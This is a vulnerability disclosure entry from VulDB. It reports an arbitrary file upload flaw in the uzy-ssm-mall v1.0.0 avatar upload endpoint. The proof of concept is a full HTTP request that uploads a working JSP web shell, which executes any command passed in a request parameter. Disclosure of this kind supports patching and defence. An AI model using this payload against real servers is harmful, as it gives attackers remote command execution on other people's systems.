Submit #549259: ghostxbh uzy-ssm-mall v1.0.0 Unrestricted Uploadinfo

Titelghostxbh uzy-ssm-mall v1.0.0 Unrestricted Upload
BeschreibungVulnerability Description In the uzy-ssm-mall v1.0.0 system, the /mall/user/uploadUserHeadImage interface has an arbitrary file upload vulnerability. Attackers can exploit this vulnerability to upload malicious files, thereby gaining server privileges. Vulnerability Location The vulnerability is located at the /mall/user/uploadUserHeadImage interface. Code Audit Process Vulnerability File Path / File Name: /mall/user/uploadUserHeadImage Cause of the Vulnerability: The code does not perform any validation on the uploaded files, allowing attackers to upload arbitrary files. Additionally, the system returns the filename of the uploaded file, which provides further convenience for attackers to exploit. Code Analysis: The code calls getUserId in multiple places to obtain the user's userid and uses userid for related CRUD operations. appid and mailid can be forged through enumeration, further increasing the exploitability of the vulnerability. POC: POST /mall/user/uploadUserHeadImage HTTP/1.1 Host: target-ip Cookie: [users'Cookie] Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 12345 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="shell.jsp" Content-Type: application/octet-stream <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); Process process = Runtime.getRuntime().exec(cmd); InputStream inputStream = process.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null) { out.println(line); } %> ------WebKitFormBoundary7MA4YWxkTrZu0gW--
Quelle⚠️ https://wiki.shikangsi.com/post/share/2f5fafb5-63d3-4784-8866-5592547a71a4
Benutzer
 XingYue_Mstir (UID 72225)
Einreichung02.04.2025 11:54 (vor 1 Jahr)
Moderieren14.04.2025 00:36 (12 days later)
StatusAkzeptiert
VulDB Eintrag304599 [ghostxbh uzy-ssm-mall 1.0.0 uploadUserHeadImage Datei erweiterte Rechte]
Punkte20

ZurückÜbersichtWeiter

Want to stay up to date on a daily basis?

Enable the mail alert feature now!